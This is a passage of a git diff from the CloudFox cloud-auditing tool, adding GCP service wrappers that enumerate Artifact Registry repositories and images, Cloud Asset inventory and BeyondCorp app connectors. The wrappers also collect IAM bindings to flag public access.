Skip - we might not have permission to get key strings + continue + } + keys[i].KeyString = keyString + } + + return keys, nil +} diff --git a/gcp/services/artifactRegistryService/artifactRegistryService.go b/gcp/services/artifactRegistryService/artifactRegistryService.go index 60aed147..108ecf88 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -3,15 +3,19 @@ package artifactregistryservice import ( "context" "fmt" + "net/url" "strings" + "time" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" "google.golang.org/api/iterator" + iampb "google.golang.org/genproto/googleapis/iam/v1" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -32,11 +36,49 @@ func New(client *artifactregistry.Client) ArtifactRegistryService { DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { return client.ListDockerImages(ctx, req, opts...) }, + RawClient: client, }, } return ars } +// NewWithSession creates an ArtifactRegistryService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (ArtifactRegistryService, error) { + ctx := context.Background() + var client *artifactregistry.Client + var err error + + if session != nil { + client, err = artifactregistry.NewClient(ctx, session.GetClientOption()) + } else { + client, err = artifactregistry.NewClient(ctx) + } + if err != nil { + return ArtifactRegistryService{}, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + } + + ars := ArtifactRegistryService{ + Client: &ArtifactRegistryClientWrapper{ + Closer: client.Close, + RepositoryLister: func(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { + return client.ListRepositories(ctx, req, opts...) + }, + LocationLister: func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] { + return client.ListLocations(ctx, req, opts...) + }, + RepositoryGetter: func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) { + return client.GetRepository(ctx, req, opts...) + }, + DockerImageLister: func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] { + return client.ListDockerImages(ctx, req, opts...) + }, + RawClient: client, + }, + Session: session, + } + return ars, nil +} + var logger internal.Logger // RepositoriesAndArtifacts retrieves both repositories and their artifacts for a given projectID. @@ -46,7 +88,7 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Retrieve repositories. repos, err := ars.Repositories(projectID) if err != nil { - return combinedInfo, fmt.Errorf("failed to retrieve repositories: %v", err) + return combinedInfo, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } combinedInfo.Repositories = repos @@ -64,7 +106,9 @@ func (ars *ArtifactRegistryService) RepositoriesAndArtifacts(projectID string) ( // Fetch artifacts for the current repository. artifacts, err := ars.Artifacts(projectID, location, repositoryName) if err != nil { - logger.InfoM(fmt.Sprintf("Failed to retrieve artifacts for repository %s: %v", repositoryName, err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Failed to retrieve artifacts for repository %s", repositoryName)) continue // Optionally continue to the next repository or handle error differently. } combinedInfo.Artifacts = append(combinedInfo.Artifacts, artifacts...) @@ -100,20 +144,110 @@ func (ars *ArtifactRegistryService) Repositories(projectID string) ([]Repository return nil, err } - repositories = append(repositories, RepositoryInfo{ - Name: repo.Name, - Format: repo.Format.String(), - Description: repo.Description, - SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), - ProjectID: projectID, - Location: location, - }) + repoInfo := RepositoryInfo{ + Name: repo.Name, + Format: repo.Format.String(), + Description: repo.Description, + SizeBytes: fmt.Sprintf("%d", repo.SizeBytes), + ProjectID: projectID, + Location: location, + Mode: repo.Mode.String(), + Labels: repo.Labels, + RegistryType: "artifact-registry", + } + + // Parse encryption + if repo.KmsKeyName != "" { + repoInfo.EncryptionType = "CMEK" + repoInfo.KMSKeyName = repo.KmsKeyName + } else { + repoInfo.EncryptionType = "Google-managed" + } + + // Parse cleanup policies + if repo.CleanupPolicies != nil { + repoInfo.CleanupPolicies = len(repo.CleanupPolicies) + } + + // Parse timestamps + if repo.CreateTime != nil { + repoInfo.CreateTime = repo.CreateTime.AsTime().Format(time.RFC3339) + } + if repo.UpdateTime != nil { + repoInfo.UpdateTime = repo.UpdateTime.AsTime().Format(time.RFC3339) + } + + // Get IAM policy for the repository + iamBindings, isPublic, publicAccess := ars.getRepositoryIAMPolicy(ctx, repo.Name) + repoInfo.IAMBindings = iamBindings + repoInfo.IsPublic = isPublic + repoInfo.PublicAccess = publicAccess + + repositories = append(repositories, repoInfo) } } return repositories, nil } +// getRepositoryIAMPolicy retrieves the IAM policy for a repository +func (ars *ArtifactRegistryService) getRepositoryIAMPolicy(ctx context.Context, repoName string) ([]IAMBinding, bool, string) { + var bindings []IAMBinding + isPublic := false + hasAllUsers := false + hasAllAuthenticatedUsers := false + + // Get raw client for IAM operations + client, ok := ars.Client.RawClient.(*artifactregistry.Client) + if !ok || client == nil { + return bindings, false, "Unknown" + } + + // Get IAM policy + req := &iampb.GetIamPolicyRequest{ + Resource: repoName, + } + + policy, err := client.GetIamPolicy(ctx, req) + if err != nil { + // Return empty bindings if we can't get the policy + return bindings, false, "Unknown" + } + + // Convert IAM policy to our binding format + for _, binding := range policy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + bindings = append(bindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" { + hasAllUsers = true + isPublic = true + } + if member == "allAuthenticatedUsers" { + hasAllAuthenticatedUsers = true + isPublic = true + } + } + } + + // Determine public access level + publicAccess := "None" + if hasAllUsers && hasAllAuthenticatedUsers { + publicAccess = "allUsers + allAuthenticatedUsers" + } else if hasAllUsers { + publicAccess = "allUsers" + } else if hasAllAuthenticatedUsers { + publicAccess = "allAuthenticatedUsers" + } + + return bindings, isPublic, publicAccess +} + // Artifacts fetches the artifacts for a given repository, handling different formats. func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, repositoryName string) ([]ArtifactInfo, error) { ctx := context.Background() @@ -128,7 +262,7 @@ func (ars *ArtifactRegistryService) Artifacts(projectID string, location string, // Fetch repository details to determine its format repo, err := ars.Client.GetRepository(ctx, &artifactregistrypb.GetRepositoryRequest{Name: repoFullName}) if err != nil { - return nil, fmt.Errorf("failed to get repository details: %v", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } // Handle different repository formats @@ -151,21 +285,33 @@ func parseDockerImageName(imageName string) DockerImageDetails { // Split the image name by '/' parts := strings.Split(imageName, "/") - // Extract details based on the known structure of the image name. - // Assuming the format is always consistent as described. + // Validate expected format: projects/{project}/locations/{location}/repositories/{repo}/dockerImages/{image@digest} + if len(parts) < 8 { + return DockerImageDetails{ImageName: imageName} + } + projectID := parts[1] location := parts[3] repository := parts[5] // The image name and digest are after the last '/', separated by '@' imageAndDigest := strings.Split(parts[7], "@") imageName = imageAndDigest[0] - digest := imageAndDigest[1] + digest := "" + if len(imageAndDigest) > 1 { + digest = imageAndDigest[1] + } + + // URL-decode the image name (e.g., "library%2Fnginx" -> "library/nginx") + decodedImageName, err := url.PathUnescape(imageName) + if err != nil { + decodedImageName = imageName // fallback to original if decode fails + } return DockerImageDetails{ ProjectID: projectID, Location: location, Repository: repository, - ImageName: imageName, + ImageName: decodedImageName, Digest: digest, } } @@ -192,17 +338,38 @@ func (ars *ArtifactRegistryService) DockerImages(repositoryName string) ([]Artif // Parse image name to extract detailed information. details := parseDockerImageName(image.Name) - // Populate the ArtifactInfo structure with Docker image details. - artifacts = append(artifacts, ArtifactInfo{ + // Build version from tags or digest + version := details.Digest + if len(image.Tags) > 0 { + version = image.Tags[0] // Use first tag as version + } + + artifact := ArtifactInfo{ Name: details.ImageName, Format: "DOCKER", Location: details.Location, Repository: details.Repository, SizeBytes: fmt.Sprintf("%d", image.ImageSizeBytes), - Updated: image.UpdateTime.AsTime().String(), Digest: details.Digest, ProjectID: details.ProjectID, - }) + Tags: image.Tags, + MediaType: image.MediaType, + URI: image.Uri, + Version: version, + } + + // Parse timestamps + if image.UpdateTime != nil { + artifact.Updated = image.UpdateTime.AsTime().Format(time.RFC3339) + } + if image.UploadTime != nil { + artifact.Uploaded = image.UploadTime.AsTime().Format(time.RFC3339) + } + if image.BuildTime != nil { + artifact.BuildTime = image.BuildTime.AsTime().Format(time.RFC3339) + } + + artifacts = append(artifacts, artifact) } return artifacts, nil @@ -227,10 +394,80 @@ func (ars *ArtifactRegistryService) projectLocations(projectID string) ([]string break } if err != nil { - return nil, fmt.Errorf("failed to list locations: %w", err) + return nil, gcpinternal.ParseGCPError(err, "artifactregistry.googleapis.com") } locations = append(locations, loc.LocationId) } return locations, nil } + +// ContainerRegistryRepositories enumerates legacy Container Registry (gcr.io) repositories +// Container Registry stores images in Cloud Storage buckets, so we check for those buckets +func (ars *ArtifactRegistryService) ContainerRegistryRepositories(projectID string) []RepositoryInfo { + var repositories []RepositoryInfo + + // Container Registry uses specific bucket naming conventions: + // - gcr.io -> artifacts.{project-id}.appspot.com (us multi-region) + // - us.gcr.io -> us.artifacts.{project-id}.appspot.com + // - eu.gcr.io -> eu.artifacts.{project-id}.appspot.com + // - asia.gcr.io -> asia.artifacts.{project-id}.appspot.com + + gcrLocations := []struct { + hostname string + location string + }{ + {"gcr.io", "us"}, + {"us.gcr.io", "us"}, + {"eu.gcr.io", "eu"}, + {"asia.gcr.io", "asia"}, + } + + for _, gcr := range gcrLocations { + // Create a repository entry for potential GCR location + // Note: We can't easily verify if the bucket exists without storage API access + // This creates potential entries that the command can verify + repo := RepositoryInfo{ + Name: fmt.Sprintf("%s/%s", gcr.hostname, projectID), + Format: "DOCKER", + Description: fmt.Sprintf("Legacy Container Registry at %s", gcr.hostname), + ProjectID: projectID, + Location: gcr.location, + Mode: "STANDARD_REPOSITORY", + EncryptionType: "Google-managed", + RegistryType: "container-registry", + PublicAccess: "Unknown", // Would need storage bucket IAM check + } + repositories = append(repositories, repo) + } + + return repositories +} + +// getMemberType extracts the member type from a GCP IAM member string +func GetMemberType(member string) string { + switch { + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + default: + return "Unknown" + } +} diff --git a/gcp/services/artifactRegistryService/artifactRegistryService_test.go b/gcp/services/artifactRegistryService/artifactRegistryService_test.go index db90e10d..1a24e596 100644 --- a/gcp/services/artifactRegistryService/artifactRegistryService_test.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService_test.go @@ -157,7 +157,8 @@ func TestArtifacts(t *testing.T) { SizeBytes: "1024", ProjectID: "project1", Digest: "sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", - Updated: "1970-01-01 00:00:00 +0000 UTC", + URI: "us-central1-docker.pkg.dev/project1/repo1/image1@sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", + Version: "sha256:e9954c1fc875017be1c3e36eca16be2d9e9bccc4bf072163515467d6a823c7cf", }, }, expectError: false, @@ -215,12 +216,16 @@ func TestRepositories(t *testing.T) { }, expectedRepositories: []artifactRegistryService.RepositoryInfo{ { - Name: "projects/project1/locations/us-central1/repositories/repo1", - Format: "DOCKER", - Description: "Test repository", - SizeBytes: "0", - ProjectID: "project1", - Location: "us-central1", + Name: "projects/project1/locations/us-central1/repositories/repo1", + Format: "DOCKER", + Description: "Test repository", + SizeBytes: "0", + ProjectID: "project1", + Location: "us-central1", + Mode: "MODE_UNSPECIFIED", + EncryptionType: "Google-managed", + RegistryType: "artifact-registry", + PublicAccess: "Unknown", }, }, expectError: false, diff --git a/gcp/services/artifactRegistryService/models.go b/gcp/services/artifactRegistryService/models.go index 24f3ca37..92253a2d 100644 --- a/gcp/services/artifactRegistryService/models.go +++ b/gcp/services/artifactRegistryService/models.go @@ -5,6 +5,7 @@ import ( artifactregistrypb "cloud.google.com/go/artifactregistry/apiv1/artifactregistrypb" "github.com/BishopFox/cloudfox/gcp/services/models" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" locationpb "google.golang.org/genproto/googleapis/cloud/location" ) @@ -15,27 +16,58 @@ type CombinedRepoArtifactInfo struct { Artifacts []ArtifactInfo `json:"artifacts"` } +// IAMBinding represents a single IAM binding on a repository +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + // ArtifactInfo represents the basic information of an artifact within a registry. type ArtifactInfo struct { - Name string `json:"name"` - Format string `json:"format"` - Version string `json:"version"` - Location string `json:"location"` - Repository string `json:"repository"` - SizeBytes string `json:"virtualSize"` - Updated string `json:"updated"` - Digest string `json:"digest"` - ProjectID string `json:"projectID"` + Name string `json:"name"` + Format string `json:"format"` + Version string `json:"version"` + Location string `json:"location"` + Repository string `json:"repository"` + SizeBytes string `json:"virtualSize"` + Updated string `json:"updated"` + Uploaded string `json:"uploaded"` + BuildTime string `json:"buildTime"` + Digest string `json:"digest"` + ProjectID string `json:"projectID"` + Tags []string `json:"tags"` + MediaType string `json:"mediaType"` + URI string `json:"uri"` } // RepositoryInfo holds information about a repository and its artifacts. type RepositoryInfo struct { + // Basic info Name string `json:"name"` Format string `json:"format"` Description string `json:"description"` SizeBytes string `json:"sizeBytes"` ProjectID string `json:"projectID"` Location string `json:"location"` + + // Security-relevant fields + Mode string `json:"mode"` // STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, REMOTE_REPOSITORY + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName"` // KMS key for CMEK + CleanupPolicies int `json:"cleanupPolicies"` // Number of cleanup policies + Labels map[string]string `json:"labels"` + + // Timestamps + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings"` + IsPublic bool `json:"isPublic"` // Has allUsers or allAuthenticatedUsers + PublicAccess string `json:"publicAccess"` // "None", "allUsers", "allAuthenticatedUsers", or "Both" + + // Registry type (for differentiating AR vs GCR) + RegistryType string `json:"registryType"` // "artifact-registry" or "container-registry" } // DockerImageDetails holds the extracted parts from a Docker image name. @@ -54,6 +86,7 @@ type ArtifactRegistryClientWrapper struct { LocationLister func(ctx context.Context, req *locationpb.ListLocationsRequest, opts ...gax.CallOption) models.GenericIterator[locationpb.Location] RepositoryGetter func(ctx context.Context, req *artifactregistrypb.GetRepositoryRequest, opts ...gax.CallOption) (*artifactregistrypb.Repository, error) DockerImageLister func(ctx context.Context, req *artifactregistrypb.ListDockerImagesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.DockerImage] + RawClient interface{} // Store raw client for IAM operations } func (w *ArtifactRegistryClientWrapper) ListRepositories(ctx context.Context, req *artifactregistrypb.ListRepositoriesRequest, opts ...gax.CallOption) models.GenericIterator[artifactregistrypb.Repository] { @@ -74,5 +107,6 @@ func (w *ArtifactRegistryClientWrapper) ListDockerImages(ctx context.Context, re // ArtifactRegistryService provides methods to interact with Artifact Registry resources. type ArtifactRegistryService struct { - Client *ArtifactRegistryClientWrapper + Client *ArtifactRegistryClientWrapper + Session *gcpinternal.SafeSession } diff --git a/gcp/services/assetService/assetService.go b/gcp/services/assetService/assetService.go new file mode 100644 index 00000000..f56441f0 --- /dev/null +++ b/gcp/services/assetService/assetService.go @@ -0,0 +1,333 @@ +package assetservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + asset "cloud.google.com/go/asset/apiv1" + assetpb "cloud.google.com/go/asset/apiv1/assetpb" + "google.golang.org/api/iterator" +) + +type AssetService struct { + session *gcpinternal.SafeSession +} + +func New() *AssetService { + return &AssetService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *AssetService { + return &AssetService{session: session} +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// AssetInfo represents a Cloud Asset +type AssetInfo struct { + Name string `json:"name"` + AssetType string `json:"assetType"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Labels map[string]string `json:"labels"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // IAM Policy details + HasIAMPolicy bool `json:"hasIamPolicy"` + IAMBindings []IAMBinding `json:"iamBindings"` + IAMBindingCount int `json:"iamBindingCount"` + PublicAccess bool `json:"publicAccess"` +} + +// AssetTypeCount tracks count of assets by type +type AssetTypeCount struct { + AssetType string `json:"assetType"` + Count int `json:"count"` +} + +// Common asset types for filtering +var CommonAssetTypes = []string{ + "compute.googleapis.com/Instance", + "compute.googleapis.com/Disk", + "compute.googleapis.com/Firewall", + "compute.googleapis.com/Network", + "compute.googleapis.com/Subnetwork", + "storage.googleapis.com/Bucket", + "iam.googleapis.com/ServiceAccount", + "iam.googleapis.com/ServiceAccountKey", + "secretmanager.googleapis.com/Secret", + "cloudkms.googleapis.com/CryptoKey", + "cloudfunctions.googleapis.com/Function", + "run.googleapis.com/Service", + "container.googleapis.com/Cluster", + "sqladmin.googleapis.com/Instance", + "pubsub.googleapis.com/Topic", + "pubsub.googleapis.com/Subscription", + "bigquery.googleapis.com/Dataset", + "bigquery.googleapis.com/Table", +} + +// ListAssets retrieves assets for a project, optionally filtered by type +func (s *AssetService) ListAssets(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAsset(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// ListAssetsWithIAM retrieves assets with their IAM policies +func (s *AssetService) ListAssetsWithIAM(projectID string, assetTypes []string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_IAM_POLICY, + } + + if len(assetTypes) > 0 { + req.AssetTypes = assetTypes + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := s.parseAssetWithIAM(assetResult, projectID) + assets = append(assets, info) + } + + return assets, nil +} + +// GetAssetTypeCounts returns a summary of asset counts by type +func (s *AssetService) GetAssetTypeCounts(projectID string) ([]AssetTypeCount, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + counts := make(map[string]int) + + parent := fmt.Sprintf("projects/%s", projectID) + + req := &assetpb.ListAssetsRequest{ + Parent: parent, + ContentType: assetpb.ContentType_RESOURCE, + } + + it := client.ListAssets(ctx, req) + for { + assetResult, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + counts[assetResult.AssetType]++ + } + + var result []AssetTypeCount + for assetType, count := range counts { + result = append(result, AssetTypeCount{ + AssetType: assetType, + Count: count, + }) + } + + return result, nil +} + +// SearchAllResources searches for resources across the organization or project +func (s *AssetService) SearchAllResources(scope string, query string) ([]AssetInfo, error) { + ctx := context.Background() + var client *asset.Client + var err error + + if s.session != nil { + client, err = asset.NewClient(ctx, s.session.GetClientOption()) + } else { + client, err = asset.NewClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + defer client.Close() + + var assets []AssetInfo + + req := &assetpb.SearchAllResourcesRequest{ + Scope: scope, + Query: query, + } + + it := client.SearchAllResources(ctx, req) + for { + resource, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudasset.googleapis.com") + } + + info := AssetInfo{ + Name: resource.Name, + AssetType: resource.AssetType, + ProjectID: resource.Project, + Location: resource.Location, + DisplayName: resource.DisplayName, + Description: resource.Description, + Labels: resource.Labels, + State: resource.State, + CreateTime: resource.CreateTime.String(), + UpdateTime: resource.UpdateTime.String(), + } + + assets = append(assets, info) + } + + return assets, nil +} + +func (s *AssetService) parseAsset(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.Resource != nil { + info.Location = assetResult.Resource.Location + } + + return info +} + +func (s *AssetService) parseAssetWithIAM(assetResult *assetpb.Asset, projectID string) AssetInfo { + info := AssetInfo{ + Name: extractAssetName(assetResult.Name), + AssetType: assetResult.AssetType, + ProjectID: projectID, + } + + if assetResult.IamPolicy != nil { + info.HasIAMPolicy = true + info.IAMBindingCount = len(assetResult.IamPolicy.Bindings) + + // Store actual bindings and check for public access + for _, binding := range assetResult.IamPolicy.Bindings { + iamBinding := IAMBinding{ + Role: binding.Role, + Members: binding.Members, + } + info.IAMBindings = append(info.IAMBindings, iamBinding) + + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + return info +} + +func extractAssetName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// ExtractAssetTypeShort returns a shortened version of the asset type +func ExtractAssetTypeShort(assetType string) string { + parts := strings.Split(assetType, "/") + if len(parts) == 2 { + return parts[1] + } + return assetType +} diff --git a/gcp/services/beyondcorpService/beyondcorpService.go b/gcp/services/beyondcorpService/beyondcorpService.go new file mode 100644 index 00000000..599520da --- /dev/null +++ b/gcp/services/beyondcorpService/beyondcorpService.go @@ -0,0 +1,231 @@ +package beyondcorpservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + beyondcorp "google.golang.org/api/beyondcorp/v1" +) + +type BeyondCorpService struct { + session *gcpinternal.SafeSession +} + +func New() *BeyondCorpService { + return &BeyondCorpService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BeyondCorpService { + return &BeyondCorpService{session: session} +} + +// getService returns a BeyondCorp service client using cached session if available +func (s *BeyondCorpService) getService(ctx context.Context) (*beyondcorp.Service, error) { + if s.session != nil { + return sdk.CachedGetBeyondCorpService(ctx, s.session) + } + return beyondcorp.NewService(ctx) +} + +// IAMBinding represents an IAM binding +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// AppConnectorInfo represents a BeyondCorp app connector +type AppConnectorInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + PrincipalInfo string `json:"principalInfo"` + ResourceInfo string `json:"resourceInfo"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// AppConnectionInfo represents a BeyondCorp app connection +type AppConnectionInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + State string `json:"state"` + Type string `json:"type"` + ApplicationEndpoint string `json:"applicationEndpoint"` + Connectors []string `json:"connectors"` + Gateway string `json:"gateway"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + IAMBindings []IAMBinding `json:"iamBindings"` + PublicAccess bool `json:"publicAccess"` +} + +// ListAppConnectors retrieves all BeyondCorp app connectors +func (s *BeyondCorpService) ListAppConnectors(projectID string) ([]AppConnectorInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connectors []AppConnectorInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnectors.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1ListAppConnectorsResponse) error { + for _, connector := range page.AppConnectors { + info := s.parseAppConnector(connector, projectID) + + // Get IAM policy for this connector + iamPolicy, iamErr := service.Projects.Locations.AppConnectors.GetIamPolicy(connector.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connectors = append(connectors, info) + } + return nil + }) + if err != nil { + return connectors, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connectors, nil +} + +// ListAppConnections retrieves all BeyondCorp app connections +func (s *BeyondCorpService) ListAppConnections(projectID string) ([]AppConnectionInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + var connections []AppConnectionInfo + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.AppConnections.List(parent) + err = req.Pages(ctx, func(page *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1ListAppConnectionsResponse) error { + for _, conn := range page.AppConnections { + info := s.parseAppConnection(conn, projectID) + + // Get IAM policy for this connection + iamPolicy, iamErr := service.Projects.Locations.AppConnections.GetIamPolicy(conn.Name).Context(ctx).Do() + if iamErr == nil && iamPolicy != nil { + for _, binding := range iamPolicy.Bindings { + info.IAMBindings = append(info.IAMBindings, IAMBinding{ + Role: binding.Role, + Members: binding.Members, + }) + // Check for public access + for _, member := range binding.Members { + if member == "allUsers" || member == "allAuthenticatedUsers" { + info.PublicAccess = true + } + } + } + } + + connections = append(connections, info) + } + return nil + }) + if err != nil { + return connections, gcpinternal.ParseGCPError(err, "beyondcorp.googleapis.com") + } + + return connections, nil +} + +func (s *BeyondCorpService) parseAppConnector(connector *beyondcorp.GoogleCloudBeyondcorpAppconnectorsV1AppConnector, projectID string) AppConnectorInfo { + info := AppConnectorInfo{ + Name: extractName(connector.Name), + FullName: connector.Name, + ProjectID: projectID, + Location: extractLocation(connector.Name), + DisplayName: connector.DisplayName, + State: connector.State, + CreateTime: connector.CreateTime, + UpdateTime: connector.UpdateTime, + } + + if connector.PrincipalInfo != nil && connector.PrincipalInfo.ServiceAccount != nil { + info.PrincipalInfo = connector.PrincipalInfo.ServiceAccount.Email + } + + if connector.ResourceInfo != nil { + info.ResourceInfo = connector.ResourceInfo.Id + } + + return info +} + +func (s *BeyondCorpService) parseAppConnection(conn *beyondcorp.GoogleCloudBeyondcorpAppconnectionsV1AppConnection, projectID string) AppConnectionInfo { + info := AppConnectionInfo{ + Name: extractName(conn.Name), + FullName: conn.Name, + ProjectID: projectID, + Location: extractLocation(conn.Name), + DisplayName: conn.DisplayName, + State: conn.State, + Type: conn.Type, + CreateTime: conn.CreateTime, + UpdateTime: conn.UpdateTime, + } + + if conn.ApplicationEndpoint != nil { + info.ApplicationEndpoint = fmt.Sprintf("%s:%d", conn.ApplicationEndpoint.Host, conn.ApplicationEndpoint.Port) + } + + for _, connector := range conn.Connectors { + info.Connectors = append(info.Connectors, extractName(connector)) + } + + if conn.Gateway != nil { + info.Gateway = extractName(conn.Gateway.AppGateway) + } + + return info +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractLocation(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "locations" && 